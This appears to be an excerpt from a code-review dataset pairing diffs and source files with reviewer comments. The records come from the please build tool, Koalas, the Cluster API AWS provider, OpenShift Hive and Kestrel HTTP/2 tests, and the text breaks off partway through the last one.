definition = "BuildLabel includes all BuildTargets in BUILD file: " + labelPath
} else {
buildDef, err = a.BuildDefFromLabel(ctx, &label, labelPath)
if err != nil {
return nil, err
}
definition = buildDef.Content
}
return &BuildLabel{
BuildLabel: &label,
Path: labelPath,
BuildDef: buildDef,
Definition: definition,
}, nil
}
// BuildDefFromLabel returns a BuildDef struct given an *core.BuildLabel and the path of the label
func (a *Analyzer) BuildDefFromLabel(ctx context.Context, label *core.BuildLabel, path string) (*BuildDef, error) {
if label.IsAllSubpackages() || label.IsAllTargets() {
return nil, nil
}
// Get the BuildDef IdentStatement from the build file
buildDef, err := a.getBuildDefByName(ctx, label.Name, path)
if err != nil {
return nil, err
}
// Get the content for the BuildDef
labelfileContent, err := ReadFile(ctx, lsp.DocumentURI(path))
if err != nil {
return nil, err
}
buildDef.Content = strings.Join(labelfileContent[buildDef.Pos.Line:buildDef.EndPos.Line+1], "\n")
return buildDef, nil
}
// getBuildDefByName returns an Identifier object of a BuildDef(call of a Build rule)
// based on the name and the buildfile path
func (a *Analyzer) getBuildDefByName(ctx context.Context, name string, path string) (*BuildDef, error) {
buildDefs, err := a.BuildDefsFromURI(ctx, lsp.DocumentURI(path))
if err != nil {
return nil, err
}
if buildDef, ok := buildDefs[name]; ok {
return buildDef, nil
}
return nil, fmt.Errorf("cannot find BuildDef for the name '%s' in '%s'", name, path)
}
// BuildDefsFromURI returns a map of buildDefname : *BuildDef
func (a *Analyzer) BuildDefsFromURI(ctx context.Context, uri lsp.DocumentURI) (map[string]*BuildDef, error) {
// Get all the statements from the build file
stmts, err := a.AspStatementFromFile(uri)
if err != nil {
return nil, err
}
buildDefs := make(map[string]*BuildDef)
var defaultVisibility []string
for _, stmt := range stmts {
if stmt.Ident == nil {
continue
}
ident := a.identFromStatement(stmt)
if ident.Type != "call" {
continue
}
// Filling in buildDef struct based on arg
var buildDef *BuildDef
for _, arg := range ident.Action.Call.Arguments {
switch arg.Name {
case "default_visibility":
defaultVisibility = aspListToStrSlice(arg.Value.Val.List)
case "name":
buildDef = &BuildDef{
Identifier: ident,
BuildDefName: TrimQuotes(arg.Value.Val.String),
}
case "visibility":
if buildDefs != nil {
buildDef.Visibility = aspListToStrSlice(arg.Value.Val.List)
}
}
}
// Set visibility
if buildDef != nil {
if buildDef.Visibility == nil {
if len(defaultVisibility) > 0 {
buildDef.Visibility = defaultVisibility
} else {
currentPkg, err := PackageLabelFromURI(uri)
if err != nil {
return nil, err
}
buildDef.Visibility = []string{currentPkg}
}
}
// Get the content for the BuildDef
labelfileContent, err := ReadFile(ctx, uri)
if err != nil {
return nil, err
}
buildDef.Content = strings.Join(labelfileContent[buildDef.Pos.Line:buildDef.EndPos.Line+1], "\n")
buildDefs[buildDef.BuildDefName] = buildDef
}
}
return buildDefs, nil
}
// BuildFileURIFromPackage takes a relative(to the reporoot) package directory, and returns a build file path
func (a *Analyzer) BuildFileURIFromPackage(packageDir string) lsp.DocumentURI {
for _, i := range a.State.Config.Parse.BuildFileName {
buildFilePath := path.Join(packageDir, i)
if !strings.HasPrefix(packageDir, core.RepoRoot) {
buildFilePath = path.Join(core.RepoRoot, buildFilePath)
}
if fs.FileExists(buildFilePath) {
return lsp.DocumentURI(buildFilePath)
}
}
return lsp.DocumentURI("")
}
// IsBuildFile takes a uri path and checks if it's a valid build file
func (a *Analyzer) IsBuildFile(uri lsp.DocumentURI) bool {
filepath, err := GetPathFromURL(uri, "file")
if err != nil {
return false
}
base := path.Base(filepath)
return a.State.Config.IsABuildFile(base)
}
// e.g. src type:list, required:false
func getArgString(argument asp.Argument) string {
argType := strings.Join(argument.Type, "|")
required := strconv.FormatBool(argument.Value == nil)
argString := argument.Name + " required:" + required
if argType != "" {
argString += ", type:" + argType
}
return argString
}
func aspListToStrSlice(listVal *asp.List) []string {
var retSlice []string
for _, i := range listVal.Values {
if i.Val.String != "" {
retSlice = append(retSlice, TrimQuotes(i.Val.String))
}
}
return retSlice
}
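
A hedged sketch of the alternative the extension check invites (hypothetical helper, not part of the please codebase): since ".build_defs" is only a convention, the suffix list could come from configuration rather than being hardcoded:

package main

import (
	"fmt"
	"path"
	"strings"
)

// isBuildDefFile checks a filename against a configurable list of
// build-definition suffixes; the list used here is an assumed default and
// would come from the plz configuration in practice.
func isBuildDefFile(filename string, suffixes []string) bool {
	base := path.Base(filename)
	for _, s := range suffixes {
		if strings.HasSuffix(base, s) {
			return true
		}
	}
	return false
}

func main() {
	suffixes := []string{".build_defs", ".build_def"} // assumed, configurable
	fmt.Println(isBuildDefFile("/repo/defs/go.build_defs", suffixes)) // true
	fmt.Println(isBuildDefFile("/repo/pkg/BUILD", suffixes))          // false
}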
| 1 | 8,541 | I'm not sure we should be doing this based on the extension? Calling them `.build_defs` is just a convention | thought-machine-please | go |
@@ -30,7 +30,6 @@ def unsupported_property(property_name, deprecated=False, reason=""):
class _MissingPandasLikeIndex(object):
# Properties
- T = unsupported_property('T')
nbytes = unsupported_property('nbytes')
shape = unsupported_property('shape')
| 1 | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from databricks.koalas.missing import _unsupported_function, _unsupported_property, common
def unsupported_function(method_name, deprecated=False, reason=""):
return _unsupported_function(class_name='pd.Index', method_name=method_name,
deprecated=deprecated, reason=reason)
def unsupported_property(property_name, deprecated=False, reason=""):
return _unsupported_property(class_name='pd.Index', property_name=property_name,
deprecated=deprecated, reason=reason)
class _MissingPandasLikeIndex(object):
# Properties
T = unsupported_property('T')
nbytes = unsupported_property('nbytes')
shape = unsupported_property('shape')
# Deprecated properties
strides = unsupported_property('strides', deprecated=True)
data = unsupported_property('data', deprecated=True)
itemsize = unsupported_property('itemsize', deprecated=True)
base = unsupported_property('base', deprecated=True)
flags = unsupported_property('flags', deprecated=True)
# Functions
append = unsupported_function('append')
argmax = unsupported_function('argmax')
argmin = unsupported_function('argmin')
argsort = unsupported_function('argsort')
asof = unsupported_function('asof')
asof_locs = unsupported_function('asof_locs')
delete = unsupported_function('delete')
difference = unsupported_function('difference')
drop = unsupported_function('drop')
drop_duplicates = unsupported_function('drop_duplicates')
droplevel = unsupported_function('droplevel')
dropna = unsupported_function('dropna')
duplicated = unsupported_function('duplicated')
equals = unsupported_function('equals')
factorize = unsupported_function('factorize')
fillna = unsupported_function('fillna')
format = unsupported_function('format')
get_indexer = unsupported_function('get_indexer')
get_indexer_for = unsupported_function('get_indexer_for')
get_indexer_non_unique = unsupported_function('get_indexer_non_unique')
get_level_values = unsupported_function('get_level_values')
get_loc = unsupported_function('get_loc')
get_slice_bound = unsupported_function('get_slice_bound')
get_value = unsupported_function('get_value')
groupby = unsupported_function('groupby')
holds_integer = unsupported_function('holds_integer')
identical = unsupported_function('identical')
insert = unsupported_function('insert')
intersection = unsupported_function('intersection')
is_ = unsupported_function('is_')
is_lexsorted_for_tuple = unsupported_function('is_lexsorted_for_tuple')
is_mixed = unsupported_function('is_mixed')
is_type_compatible = unsupported_function('is_type_compatible')
join = unsupported_function('join')
map = unsupported_function('map')
max = unsupported_function('max')
min = unsupported_function('min')
nunique = unsupported_function('nunique')
putmask = unsupported_function('putmask')
ravel = unsupported_function('ravel')
reindex = unsupported_function('reindex')
repeat = unsupported_function('repeat')
searchsorted = unsupported_function('searchsorted')
set_names = unsupported_function('set_names')
set_value = unsupported_function('set_value')
slice_indexer = unsupported_function('slice_indexer')
slice_locs = unsupported_function('slice_locs')
sort = unsupported_function('sort')
sort_values = unsupported_function('sort_values')
sortlevel = unsupported_function('sortlevel')
symmetric_difference = unsupported_function('symmetric_difference')
take = unsupported_function('take')
to_flat_index = unsupported_function('to_flat_index')
to_frame = unsupported_function('to_frame')
to_native_types = unsupported_function('to_native_types')
to_numpy = unsupported_function('to_numpy')
transpose = unsupported_function('transpose')
union = unsupported_function('union')
value_counts = unsupported_function('value_counts')
view = unsupported_function('view')
where = unsupported_function('where')
# Deprecated functions
get_duplicates = unsupported_function('get_duplicates', deprecated=True)
summary = unsupported_function('summary', deprecated=True)
get_values = unsupported_function('get_values', deprecated=True)
item = unsupported_function('item', deprecated=True)
contains = unsupported_function('contains', deprecated=True)
# Properties we won't support.
values = common.values(unsupported_property)
array = common.array(unsupported_property)
# Functions we won't support.
memory_usage = common.memory_usage(unsupported_function)
to_list = common.to_list(unsupported_function)
tolist = common.tolist(unsupported_function)
__iter__ = common.__iter__(unsupported_function)
class _MissingPandasLikeMultiIndex(object):
# Properties
T = unsupported_property('T')
is_all_dates = unsupported_property('is_all_dates')
levshape = unsupported_property('levshape')
shape = unsupported_property('shape')
# Deprecated properties
strides = unsupported_property('strides', deprecated=True)
data = unsupported_property('data', deprecated=True)
base = unsupported_property('base', deprecated=True)
itemsize = unsupported_property('itemsize', deprecated=True)
labels = unsupported_property('labels', deprecated=True)
flags = unsupported_property('flags', deprecated=True)
# Functions
append = unsupported_function('append')
argmax = unsupported_function('argmax')
argmin = unsupported_function('argmin')
argsort = unsupported_function('argsort')
asof = unsupported_function('asof')
asof_locs = unsupported_function('asof_locs')
delete = unsupported_function('delete')
difference = unsupported_function('difference')
drop = unsupported_function('drop')
drop_duplicates = unsupported_function('drop_duplicates')
droplevel = unsupported_function('droplevel')
dropna = unsupported_function('dropna')
duplicated = unsupported_function('duplicated')
equal_levels = unsupported_function('equal_levels')
equals = unsupported_function('equals')
factorize = unsupported_function('factorize')
fillna = unsupported_function('fillna')
format = unsupported_function('format')
get_indexer = unsupported_function('get_indexer')
get_indexer_for = unsupported_function('get_indexer_for')
get_indexer_non_unique = unsupported_function('get_indexer_non_unique')
get_level_values = unsupported_function('get_level_values')
get_loc = unsupported_function('get_loc')
get_loc_level = unsupported_function('get_loc_level')
get_locs = unsupported_function('get_locs')
get_slice_bound = unsupported_function('get_slice_bound')
get_value = unsupported_function('get_value')
groupby = unsupported_function('groupby')
holds_integer = unsupported_function('holds_integer')
identical = unsupported_function('identical')
insert = unsupported_function('insert')
intersection = unsupported_function('intersection')
is_ = unsupported_function('is_')
is_lexsorted = unsupported_function('is_lexsorted')
is_lexsorted_for_tuple = unsupported_function('is_lexsorted_for_tuple')
is_mixed = unsupported_function('is_mixed')
is_type_compatible = unsupported_function('is_type_compatible')
join = unsupported_function('join')
map = unsupported_function('map')
max = unsupported_function('max')
min = unsupported_function('min')
nunique = unsupported_function('nunique')
putmask = unsupported_function('putmask')
ravel = unsupported_function('ravel')
reindex = unsupported_function('reindex')
remove_unused_levels = unsupported_function('remove_unused_levels')
reorder_levels = unsupported_function('reorder_levels')
repeat = unsupported_function('repeat')
searchsorted = unsupported_function('searchsorted')
set_codes = unsupported_function('set_codes')
set_labels = unsupported_function('set_labels')
set_levels = unsupported_function('set_levels')
set_names = unsupported_function('set_names')
set_value = unsupported_function('set_value')
slice_indexer = unsupported_function('slice_indexer')
slice_locs = unsupported_function('slice_locs')
sort = unsupported_function('sort')
sort_values = unsupported_function('sort_values')
sortlevel = unsupported_function('sortlevel')
swaplevel = unsupported_function('swaplevel')
symmetric_difference = unsupported_function('symmetric_difference')
take = unsupported_function('take')
to_flat_index = unsupported_function('to_flat_index')
to_frame = unsupported_function('to_frame')
to_native_types = unsupported_function('to_native_types')
to_numpy = unsupported_function('to_numpy')
transpose = unsupported_function('transpose')
truncate = unsupported_function('truncate')
union = unsupported_function('union')
value_counts = unsupported_function('value_counts')
view = unsupported_function('view')
where = unsupported_function('where')
# Deprecated functions
get_duplicates = unsupported_function('get_duplicates', deprecated=True)
summary = unsupported_function('summary', deprecated=True)
to_hierarchical = unsupported_function('to_hierarchical', deprecated=True)
get_values = unsupported_function('get_values', deprecated=True)
contains = unsupported_function('contains', deprecated=True)
item = unsupported_function('item', deprecated=True)
# Functions we won't support.
values = common.values(unsupported_property)
array = common.array(unsupported_property)
codes = unsupported_property(
'codes',
reason="'codes' requires to collect all data into the driver which is against the "
"design principle of Koalas. Alternatively, you could call 'to_pandas()' and"
" use 'codes' property in pandas.")
levels = unsupported_property(
'levels',
reason="'levels' requires to collect all data into the driver which is against the "
"design principle of Koalas. Alternatively, you could call 'to_pandas()' and"
" use 'levels' property in pandas.")
__iter__ = common.__iter__(unsupported_function)
# Properties we won't support.
memory_usage = common.memory_usage(unsupported_function)
to_list = common.to_list(unsupported_function)
tolist = common.tolist(unsupported_function)
| 1 | 13,046 | Should remove in `_MissingPandasLikeMultiIndex:` too | databricks-koalas | py |
@@ -107,6 +107,10 @@ type AWSLoadBalancerSpec struct {
// Defaults to false.
// +optional
CrossZoneLoadBalancing bool `json:"crossZoneLoadBalancing,omitempty"`
+
+ // Subnets specifies the subnets that should be used by the load balancer
+ // +optional
+ Subnets Subnets `json:"subnets,omitempty"`
}
// AWSClusterStatus defines the observed state of AWSCluster | 1 | /*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1alpha3
import (
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
clusterv1 "sigs.k8s.io/cluster-api/api/v1alpha3"
)
const (
// ClusterFinalizer allows ReconcileAWSCluster to clean up AWS resources associated with AWSCluster before
// removing it from the apiserver.
ClusterFinalizer = "awscluster.infrastructure.cluster.x-k8s.io"
)
// AWSClusterSpec defines the desired state of AWSCluster
type AWSClusterSpec struct {
// NetworkSpec encapsulates all things related to AWS network.
NetworkSpec NetworkSpec `json:"networkSpec,omitempty"`
// The AWS Region the cluster lives in.
Region string `json:"region,omitempty"`
// SSHKeyName is the name of the ssh key to attach to the bastion host. Valid values are empty string (do not use SSH keys), a valid SSH key name, or omitted (use the default SSH key name)
// +optional
SSHKeyName *string `json:"sshKeyName,omitempty"`
// ControlPlaneEndpoint represents the endpoint used to communicate with the control plane.
// +optional
ControlPlaneEndpoint clusterv1.APIEndpoint `json:"controlPlaneEndpoint"`
// AdditionalTags is an optional set of tags to add to AWS resources managed by the AWS provider, in addition to the
// ones added by default.
// +optional
AdditionalTags Tags `json:"additionalTags,omitempty"`
// ControlPlaneLoadBalancer is optional configuration for customizing control plane behavior
// +optional
ControlPlaneLoadBalancer *AWSLoadBalancerSpec `json:"controlPlaneLoadBalancer,omitempty"`
// ImageLookupFormat is the AMI naming format to look up machine images when
// a machine does not specify an AMI. When set, this will be used for all
// cluster machines unless a machine specifies a different ImageLookupOrg.
// Supports substitutions for {{.BaseOS}} and {{.K8sVersion}} with the base
// OS and kubernetes version, respectively. The BaseOS will be the value in
// ImageLookupBaseOS or ubuntu (the default), and the kubernetes version as
// defined by the packages produced by kubernetes/release without v as a
// prefix: 1.13.0, 1.12.5-mybuild.1, or 1.17.3. For example, the default
// image format of capa-ami-{{.BaseOS}}-?{{.K8sVersion}}-* will end up
// searching for AMIs that match the pattern capa-ami-ubuntu-?1.18.0-* for a
// Machine that is targeting kubernetes v1.18.0 and the ubuntu base OS. See
// also: https://golang.org/pkg/text/template/
// +optional
ImageLookupFormat string `json:"imageLookupFormat,omitempty"`
// ImageLookupOrg is the AWS Organization ID to look up machine images when a
// machine does not specify an AMI. When set, this will be used for all
// cluster machines unless a machine specifies a different ImageLookupOrg.
// +optional
ImageLookupOrg string `json:"imageLookupOrg,omitempty"`
// ImageLookupBaseOS is the name of the base operating system used to look
// up machine images when a machine does not specify an AMI. When set, this
// will be used for all cluster machines unless a machine specifies a
// different ImageLookupBaseOS.
ImageLookupBaseOS string `json:"imageLookupBaseOS,omitempty"`
// Bastion contains options to configure the bastion host.
// +optional
Bastion Bastion `json:"bastion"`
}
type Bastion struct {
// Enabled allows this provider to create a bastion host instance
// with a public ip to access the VPC private network.
// +optional
Enabled bool `json:"enabled"`
}
// AWSLoadBalancerSpec defines the desired state of an AWS load balancer
type AWSLoadBalancerSpec struct {
// Scheme sets the scheme of the load balancer (defaults to Internet-facing)
// +optional
Scheme *ClassicELBScheme `json:"scheme,omitempty"`
// CrossZoneLoadBalancing enables the classic ELB cross availability zone balancing.
//
// With cross-zone load balancing, each load balancer node for your Classic Load Balancer
// distributes requests evenly across the registered instances in all enabled Availability Zones.
// If cross-zone load balancing is disabled, each load balancer node distributes requests evenly across
// the registered instances in its Availability Zone only.
//
// Defaults to false.
// +optional
CrossZoneLoadBalancing bool `json:"crossZoneLoadBalancing,omitempty"`
}
// AWSClusterStatus defines the observed state of AWSCluster
type AWSClusterStatus struct {
// +kubebuilder:default=false
Ready bool `json:"ready"`
Network Network `json:"network,omitempty"`
FailureDomains clusterv1.FailureDomains `json:"failureDomains,omitempty"`
Bastion *Instance `json:"bastion,omitempty"`
}
// +kubebuilder:object:root=true
// +kubebuilder:resource:path=awsclusters,scope=Namespaced,categories=cluster-api
// +kubebuilder:storageversion
// +kubebuilder:subresource:status
// +kubebuilder:printcolumn:name="Cluster",type="string",JSONPath=".metadata.labels.cluster\\.x-k8s\\.io/cluster-name",description="Cluster to which this AWSCluster belongs"
// +kubebuilder:printcolumn:name="Ready",type="string",JSONPath=".status.ready",description="Cluster infrastructure is ready for EC2 instances"
// +kubebuilder:printcolumn:name="VPC",type="string",JSONPath=".spec.networkSpec.vpc.id",description="AWS VPC the cluster is using"
// +kubebuilder:printcolumn:name="Endpoint",type="string",JSONPath=".status.apiEndpoints[0]",description="API Endpoint",priority=1
// +kubebuilder:printcolumn:name="Bastion IP",type="string",JSONPath=".status.bastion.publicIp",description="Bastion IP address for breakglass access"
// AWSCluster is the Schema for the awsclusters API
type AWSCluster struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata,omitempty"`
Spec AWSClusterSpec `json:"spec,omitempty"`
Status AWSClusterStatus `json:"status,omitempty"`
}
// +kubebuilder:object:root=true
// AWSClusterList contains a list of AWSCluster
type AWSClusterList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata,omitempty"`
Items []AWSCluster `json:"items"`
}
func init() {
SchemeBuilder.Register(&AWSCluster{}, &AWSClusterList{})
}
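
A hedged sketch of the "copy the types to be more local" idea (hypothetical type names, not the actual CAPA API): the load balancer spec could carry a narrow subnet reference instead of reusing the full Subnets type with its NAT gateway and routing fields:

package main

import "fmt"

// AWSLoadBalancerSubnetRef is a hypothetical, narrowly scoped type holding
// only the fields a control-plane load balancer needs from a subnet.
type AWSLoadBalancerSubnetRef struct {
	ID               string `json:"id"`
	AvailabilityZone string `json:"availabilityZone,omitempty"`
}

// LoadBalancerSpecSketch mirrors the spec shape with the narrower subnet type.
type LoadBalancerSpecSketch struct {
	CrossZoneLoadBalancing bool                       `json:"crossZoneLoadBalancing,omitempty"`
	Subnets                []AWSLoadBalancerSubnetRef `json:"subnets,omitempty"`
}

func main() {
	spec := LoadBalancerSpecSketch{
		Subnets: []AWSLoadBalancerSubnetRef{{ID: "subnet-0123456789abcdef0", AvailabilityZone: "us-east-1a"}},
	}
	fmt.Printf("%+v\n", spec)
}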
| 1 | 15,274 | We should scope this down to the bits that we're actually using, otherwise the API is going to be problematic, as it includes references to NAT gateways and public and/or private subnets. Copying the types to be more local to the task in hand is fine. | kubernetes-sigs-cluster-api-provider-aws | go |
@@ -45,6 +45,12 @@ type AWSDNSZoneSpec struct {
// to these tags,the DNS Zone controller will set a hive.openhsift.io/hostedzone tag
// identifying the HostedZone record that it belongs to.
AdditionalTags []AWSResourceTag `json:"additionalTags,omitempty"`
+
+ // Region is the AWS region to use for route53 operations.
+ // This defaults to us-east-1.
+ // For AWS China, use cn-northwest-1.
+ // +optional
+ Region string `json:"region,omitempty"`
}
// AWSResourceTag represents a tag that is applied to an AWS cloud resource | 1 | package v1
import (
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
const (
// FinalizerDNSZone is used on DNSZones to ensure we successfully deprovision
// the cloud objects before cleaning up the API object.
FinalizerDNSZone string = "hive.openshift.io/dnszone"
// FinalizerDNSEndpoint is used on DNSZones to ensure we successfully
// delete the parent-link records before cleaning up the API object.
FinalizerDNSEndpoint string = "hive.openshift.io/dnsendpoint"
)
// DNSZoneSpec defines the desired state of DNSZone
type DNSZoneSpec struct {
// Zone is the DNS zone to host
Zone string `json:"zone"`
// LinkToParentDomain specifies whether DNS records should
// be automatically created to link this DNSZone with a
// parent domain.
// +optional
LinkToParentDomain bool `json:"linkToParentDomain,omitempty"`
// AWS specifies AWS-specific cloud configuration
// +optional
AWS *AWSDNSZoneSpec `json:"aws,omitempty"`
// GCP specifies GCP-specific cloud configuration
// +optional
GCP *GCPDNSZoneSpec `json:"gcp,omitempty"`
}
// AWSDNSZoneSpec contains AWS-specific DNSZone specifications
type AWSDNSZoneSpec struct {
// CredentialsSecretRef contains a reference to a secret that contains AWS credentials
// for CRUD operations
CredentialsSecretRef corev1.LocalObjectReference `json:"credentialsSecretRef"`
// AdditionalTags is a set of additional tags to set on the DNS hosted zone. In addition
// to these tags,the DNS Zone controller will set a hive.openhsift.io/hostedzone tag
// identifying the HostedZone record that it belongs to.
AdditionalTags []AWSResourceTag `json:"additionalTags,omitempty"`
}
// AWSResourceTag represents a tag that is applied to an AWS cloud resource
type AWSResourceTag struct {
// Key is the key for the tag
Key string `json:"key"`
// Value is the value for the tag
Value string `json:"value"`
}
// GCPDNSZoneSpec contains GCP-specific DNSZone specifications
type GCPDNSZoneSpec struct {
// CredentialsSecretRef references a secret that will be used to authenticate with
// GCP CloudDNS. It will need permission to create and manage CloudDNS Hosted Zones.
// Secret should have a key named 'osServiceAccount.json'.
// The credentials must specify the project to use.
CredentialsSecretRef corev1.LocalObjectReference `json:"credentialsSecretRef"`
}
// DNSZoneStatus defines the observed state of DNSZone
type DNSZoneStatus struct {
// LastSyncTimestamp is the time that the zone was last sync'd.
// +optional
LastSyncTimestamp *metav1.Time `json:"lastSyncTimestamp,omitempty"`
// LastSyncGeneration is the generation of the zone resource that was last sync'd. This is used to know
// if the Object has changed and we should sync immediately.
LastSyncGeneration int64 `json:"lastSyncGeneration"`
// NameServers is a list of nameservers for this DNS zone
// +optional
NameServers []string `json:"nameServers,omitempty"`
// AWSDNSZoneStatus contains status information specific to AWS
// +optional
AWS *AWSDNSZoneStatus `json:"aws,omitempty"`
// GCPDNSZoneStatus contains status information specific to GCP
// +optional
GCP *GCPDNSZoneStatus `json:"gcp,omitempty"`
// Conditions includes more detailed status for the DNSZone
// +optional
Conditions []DNSZoneCondition `json:"conditions,omitempty"`
}
// AWSDNSZoneStatus contains status information specific to AWS DNS zones
type AWSDNSZoneStatus struct {
// ZoneID is the ID of the zone in AWS
// +optional
ZoneID *string `json:"zoneID,omitempty"`
}
// GCPDNSZoneStatus contains status information specific to GCP Cloud DNS zones
type GCPDNSZoneStatus struct {
// ZoneName is the name of the zone in GCP Cloud DNS
// +optional
ZoneName *string `json:"zoneName,omitempty"`
}
// DNSZoneCondition contains details for the current condition of a DNSZone
type DNSZoneCondition struct {
// Type is the type of the condition.
Type DNSZoneConditionType `json:"type"`
// Status is the status of the condition.
Status corev1.ConditionStatus `json:"status"`
// LastProbeTime is the last time we probed the condition.
// +optional
LastProbeTime metav1.Time `json:"lastProbeTime,omitempty"`
// LastTransitionTime is the last time the condition transitioned from one status to another.
// +optional
LastTransitionTime metav1.Time `json:"lastTransitionTime,omitempty"`
// Reason is a unique, one-word, CamelCase reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Message is a human-readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
// DNSZoneConditionType is a valid value for DNSZoneCondition.Type
type DNSZoneConditionType string
const (
// ZoneAvailableDNSZoneCondition is true if the DNSZone is responding to DNS queries
ZoneAvailableDNSZoneCondition DNSZoneConditionType = "ZoneAvailable"
// ParentLinkCreatedCondition is true if the parent link has been created
ParentLinkCreatedCondition DNSZoneConditionType = "ParentLinkCreated"
// DomainNotManaged is true if we try to reconcile a DNSZone and the HiveConfig
// does not contain a ManagedDNS entry for the domain in the DNSZone
DomainNotManaged DNSZoneConditionType = "DomainNotManaged"
)
// +genclient
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// DNSZone is the Schema for the dnszones API
// +k8s:openapi-gen=true
// +kubebuilder:subresource:status
type DNSZone struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata,omitempty"`
Spec DNSZoneSpec `json:"spec,omitempty"`
Status DNSZoneStatus `json:"status,omitempty"`
}
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// DNSZoneList contains a list of DNSZone
type DNSZoneList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata,omitempty"`
Items []DNSZone `json:"items"`
}
func init() {
SchemeBuilder.Register(&DNSZone{}, &DNSZoneList{})
}
| 1 | 10,891 | Is it a hard requirement for this field to be 'cn-northwest-1' when wanting to interact with AWS China? It appears that putting in 'cn-north-1' would also result in using the alternative API endpoint (with the region overridden to use 'cn-northwest-1' for the created AWS client). | openshift-hive | go
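To illustrate the question above, the following Go sketch shows one way a controller could default and normalize the new Region field before building its Route53 client. It is only a sketch under stated assumptions: the newRoute53Client helper is made up, and the cn-north-1 to cn-northwest-1 mapping encodes the reviewer's hypothesis about the China partition rather than confirmed hive behavior.

package main

import (
	"fmt"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/session"
	"github.com/aws/aws-sdk-go/service/route53"
)

// newRoute53Client is an illustrative helper, not hive's actual code. It
// applies the documented us-east-1 default and, as an assumption, folds
// cn-north-1 into cn-northwest-1 so either value reaches the AWS China
// Route53 endpoint.
func newRoute53Client(region string) (*route53.Route53, error) {
	switch region {
	case "":
		region = "us-east-1" // default documented in the patch
	case "cn-north-1":
		region = "cn-northwest-1" // assumption: normalize to the China partition's Route53 region
	}
	sess, err := session.NewSession(&aws.Config{Region: aws.String(region)})
	if err != nil {
		return nil, fmt.Errorf("creating AWS session: %w", err)
	}
	return route53.New(sess), nil
}

func main() {
	if _, err := newRoute53Client("cn-northwest-1"); err != nil {
		fmt.Println(err)
	}
}

Whether hive should also accept cn-north-1, as the reviewer asks, is a separate decision; the sketch only shows where such a normalization would live.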
@@ -812,7 +812,7 @@ namespace Microsoft.AspNetCore.Server.Kestrel.Core.Tests
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
- [Fact]
+ [Fact(Skip="Flaky test #2799")]
public async Task ContentLength_Received_MultipleDataFramesOverSize_Reset()
{
IOException thrownEx = null; | 1 | // Copyright (c) .NET Foundation. All rights reserved.
// Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.ExceptionServices;
using System.Threading;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Connections;
using Microsoft.AspNetCore.Http;
using Microsoft.AspNetCore.Http.Features;
using Microsoft.AspNetCore.Server.Kestrel.Core.Features;
using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http2;
using Microsoft.AspNetCore.Testing;
using Microsoft.Extensions.Logging;
using Microsoft.Net.Http.Headers;
using Moq;
using Xunit;
namespace Microsoft.AspNetCore.Server.Kestrel.Core.Tests
{
public class Http2StreamTests : Http2TestBase
{
[Fact]
public async Task HEADERS_Received_EmptyMethod_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, ""),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "localhost:80"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.FormatHttp2ErrorMethodInvalid(""));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
        public async Task HEADERS_Received_InvalidCustomMethod_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "Hello,World"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "localhost:80"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.FormatHttp2ErrorMethodInvalid("Hello,World"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_CustomMethod_Accepted()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "Custom"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "localhost:80"),
};
await InitializeConnectionAsync(_echoMethod);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 70,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
